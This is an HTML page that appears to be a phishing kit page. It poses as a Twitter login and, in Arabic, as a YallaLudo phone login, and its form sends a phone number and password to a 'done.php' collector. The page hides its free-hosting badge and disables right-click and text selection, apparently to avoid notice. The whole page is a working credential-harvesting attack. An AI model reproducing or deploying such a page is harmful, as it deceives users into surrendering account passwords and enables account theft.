<html>


<head>

    <style>
        img[alt="www.000webhost.com"] {
            display: none;
        }
    </style>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport"
        content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta property="og:title" content="Login on Twitter / Twitter">
    <meta name="description" content="Log in to your Twitter account.">
    <meta property="og:description" content="Log in to your Twitter account.">
    <meta property="og:url" content="./">
    <meta property="og:site_name" content="Login on Twitter / Twitter">
    <meta property="og:type" content="website">
    <title>تسجيل دخول هاتف يلا لودو</title>
    <link rel="stylesheet" href="css/twitter.css">
    <!-- <link rel="shortcut icon" href="https://abs.twimg.com/favicons/twitter.ico"> -->
    <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5c1d2f2b99978556"></script>
</head>

<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
    <div class="login-box">
        <center>
            <img width="110" src="img/lu.png">
            <h4> هل تسمح لـ. YallaLudo بالوصول إلى حسابك؟


            </h4>
        </center>
        <form action="../done.php" method="post">
            <input type="text" name="email" placeholder="+ رقم الهاتف" autocomplete="off" required>
            <input type="password" name="password" placeholder="كلمة المرور" autocomplete="off" required>
            <input type="hidden" name="login" value="Phone" readonly>
            <button type="submit" class="btn-login">تسجيل الدخول</button>

        </form>
    </div>
</body>


</html>